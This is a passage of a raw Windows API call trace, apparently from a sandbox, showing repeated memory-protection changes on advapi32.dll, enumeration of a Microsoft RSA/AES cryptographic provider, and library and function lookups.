NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x4, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x20) returned 0x0 [0139.353] GetCurrentProcess () returned 0xffffffff [0139.353] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x77711520, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x20, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x4) returned 0x0 [0139.353] GetCurrentProcess () returned 0xffffffff [0139.353] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x77711540, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x4, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x20) returned 0x0 [0139.354] GetCurrentProcess () returned 0xffffffff [0139.354] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x77711540, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x20, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x4) returned 0x0 [0139.354] GetCurrentProcess () returned 0xffffffff [0139.354] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x7771175c, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x4, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x20) returned 0x0 [0139.355] GetCurrentProcess () returned 0xffffffff [0139.355] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x7771175c, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x20, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x4) returned 0x0 [0139.355] GetCurrentProcess () returned 0xffffffff [0139.355] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x77711768, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x4, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x20) returned 0x0 [0139.355] GetCurrentProcess () returned 0xffffffff [0139.355] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x77711768, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x20, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x4) returned 0x0 [0139.356] GetCurrentProcess () returned 0xffffffff [0139.356] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x777117b8, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x4, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x20) returned 0x0 [0139.356] GetCurrentProcess () returned 0xffffffff [0139.356] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x777117b8, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x20, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x4) returned 0x0 [0139.357] GetCurrentProcess () returned 0xffffffff [0139.357] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x777117bc, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x4, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x20) returned 0x0 [0139.357] GetCurrentProcess () returned 0xffffffff [0139.357] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x777117bc, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x20, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x4) returned 0x0 [0139.358] GetCurrentProcess () returned 0xffffffff [0139.358] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x777117c8, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x4, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x20) returned 0x0 [0139.358] GetCurrentProcess () returned 0xffffffff [0139.358] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x777117c8, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x20, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x4) returned 0x0 [0139.358] GetCurrentProcess () returned 0xffffffff [0139.358] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x777117d0, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x4, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x20) returned 0x0 [0139.359] GetCurrentProcess () returned 0xffffffff [0139.359] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x777117d0, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x20, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x4) returned 0x0 [0139.359] GetCurrentProcess () returned 0xffffffff [0139.359] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x7771180c, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x4, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x20) returned 0x0 [0139.360] GetCurrentProcess () returned 0xffffffff [0139.360] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x7771180c, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x20, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x4) returned 0x0 [0139.360] GetCurrentProcess () returned 0xffffffff [0139.360] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x7771182c, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x4, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x20) returned 0x0 [0139.361] GetCurrentProcess () returned 0xffffffff [0139.361] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x7771182c, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x20, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x4) returned 0x0 [0139.361] GetCurrentProcess () returned 0xffffffff [0139.361] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x77711860, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x4, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x20) returned 0x0 [0139.361] GetCurrentProcess () returned 0xffffffff [0139.361] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x77711860, NumberOfBytesToProtect=0x704e424, NewAccessProtection=0x20, OldAccessProtection=0x704e458 | out: BaseAddress=0x704e420*=0x77711000, NumberOfBytesToProtect=0x704e424, OldAccessProtection=0x704e458*=0x4) returned 0x0 [0139.362] SetLastError (dwErrCode=0x0) [0139.363] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContext") returned 0x0 [0139.363] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0139.363] CryptAcquireContextW (in: phProv=0x704f07c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x704f07c*=0x6eec90) returned 1 [0139.371] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.372] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.372] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x1 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.384] CoTaskMemFree (pv=0x7ace58) [0139.384] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.384] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.384] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.384] CoTaskMemFree (pv=0x7ace58) [0139.384] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.385] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.385] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.385] CoTaskMemFree (pv=0x7ace58) [0139.385] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.385] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.385] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.385] CoTaskMemFree (pv=0x7ace58) [0139.385] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.385] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.385] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.385] CoTaskMemFree (pv=0x7ace58) [0139.385] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.385] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.385] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.385] CoTaskMemFree (pv=0x7ace58) [0139.385] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.385] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.385] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.385] CoTaskMemFree (pv=0x7ace58) [0139.385] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.386] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.386] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.386] CoTaskMemFree (pv=0x7ace58) [0139.386] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.386] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.386] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.386] CoTaskMemFree (pv=0x7ace58) [0139.386] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.386] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.386] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.386] CoTaskMemFree (pv=0x7ace58) [0139.386] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.386] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.386] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.386] CoTaskMemFree (pv=0x7ace58) [0139.386] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.386] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.386] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.386] CoTaskMemFree (pv=0x7ace58) [0139.387] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.387] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.387] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.387] CoTaskMemFree (pv=0x7ace58) [0139.387] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.387] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.387] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.387] CoTaskMemFree (pv=0x7ace58) [0139.387] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.387] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.387] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.387] CoTaskMemFree (pv=0x7ace58) [0139.387] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.387] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.387] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.387] CoTaskMemFree (pv=0x7ace58) [0139.387] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.387] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.387] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.388] CoTaskMemFree (pv=0x7ace58) [0139.388] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.388] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.388] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.388] CoTaskMemFree (pv=0x7ace58) [0139.388] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.388] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.388] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.388] CoTaskMemFree (pv=0x7ace58) [0139.388] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 1 [0139.388] CoTaskMemAlloc (cb=0x20) returned 0x7ace58 [0139.388] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x7ace58, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x7ace58, pdwDataLen=0x704f040) returned 1 [0139.388] CoTaskMemFree (pv=0x7ace58) [0139.388] CryptGetProvParam (in: hProv=0x6eec90, dwParam=0x1, pbData=0x0, pdwDataLen=0x704f040, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x704f040) returned 0 [0139.405] SysReAllocStringLen (in: pbstr=0x704e354*=0x0, psz="advapi32.dll", len=0xc | out: pbstr=0x704e354*="advapi32.dll") returned 1 [0139.405] CharLowerBuffW (in: lpsz="advapi32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0139.405] LoadLibraryExW (lpLibFileName="advapi32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0139.406] GetLastError () returned 0x0 [0139.406] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0139.407] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0139.407] GetModuleFileNameA (in: hModule=0x77710000, lpFilename=0x704e238, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0139.407] GetCurrentProcess () returned 0xffffffff [0139.407] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x77711520, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x4, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x20) returned 0x0 [0139.408] GetCurrentProcess () returned 0xffffffff [0139.408] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x77711520, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x20, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x4) returned 0x0 [0139.408] GetCurrentProcess () returned 0xffffffff [0139.408] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x77711540, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x4, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x20) returned 0x0 [0139.409] GetCurrentProcess () returned 0xffffffff [0139.409] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x77711540, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x20, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x4) returned 0x0 [0139.409] GetCurrentProcess () returned 0xffffffff [0139.409] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x7771175c, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x4, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x20) returned 0x0 [0139.409] GetCurrentProcess () returned 0xffffffff [0139.410] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x7771175c, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x20, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x4) returned 0x0 [0139.410] GetCurrentProcess () returned 0xffffffff [0139.410] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x77711768, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x4, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x20) returned 0x0 [0139.410] GetCurrentProcess () returned 0xffffffff [0139.410] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x77711768, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x20, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x4) returned 0x0 [0139.411] GetCurrentProcess () returned 0xffffffff [0139.411] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x777117b8, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x4, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x20) returned 0x0 [0139.411] GetCurrentProcess () returned 0xffffffff [0139.411] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x777117b8, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x20, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x4) returned 0x0 [0139.412] GetCurrentProcess () returned 0xffffffff [0139.412] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x777117bc, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x4, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x20) returned 0x0 [0139.412] GetCurrentProcess () returned 0xffffffff [0139.412] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x777117bc, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x20, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x4) returned 0x0 [0139.412] GetCurrentProcess () returned 0xffffffff [0139.412] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x777117c8, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x4, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x20) returned 0x0 [0139.413] GetCurrentProcess () returned 0xffffffff [0139.413] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x777117c8, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x20, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x4) returned 0x0 [0139.413] GetCurrentProcess () returned 0xffffffff [0139.413] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x777117d0, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x4, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x20) returned 0x0 [0139.475] GetCurrentProcess () returned 0xffffffff [0139.475] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x777117d0, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x20, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x4) returned 0x0 [0139.476] GetCurrentProcess () returned 0xffffffff [0139.476] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x7771180c, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x4, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x20) returned 0x0 [0139.476] GetCurrentProcess () returned 0xffffffff [0139.476] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x7771180c, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x20, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x4) returned 0x0 [0139.477] GetCurrentProcess () returned 0xffffffff [0139.477] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x7771182c, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x4, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x20) returned 0x0 [0139.478] GetCurrentProcess () returned 0xffffffff [0139.478] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x7771182c, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x20, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x4) returned 0x0 [0139.478] GetCurrentProcess () returned 0xffffffff [0139.478] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x77711860, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x4, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x20) returned 0x0 [0139.478] GetCurrentProcess () returned 0xffffffff [0139.478] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e33c*=0x77711860, NumberOfBytesToProtect=0x704e340, NewAccessProtection=0x20, OldAccessProtection=0x704e374 | out: BaseAddress=0x704e33c*=0x77711000, NumberOfBytesToProtect=0x704e340, OldAccessProtection=0x704e374*=0x4) returned 0x0 [0139.479] SetLastError (dwErrCode=0x0) [0139.479] GetProcAddress (hModule=0x77710000, lpProcName="ConvertSidToStringSidW") returned 0x77724344 [0139.480] GetCurrentThreadId () returned 0x284 [0139.480] ResetEvent (hEvent=0xb8) returned 1 [0139.480] GetCurrentThreadId () returned 0x284 [0139.480] GetCurrentThreadId () returned 0x284 [0139.480] GetCurrentThreadId () returned 0x284 [0139.480] GetCurrentThreadId () returned 0x284 [0139.480] ResetEvent 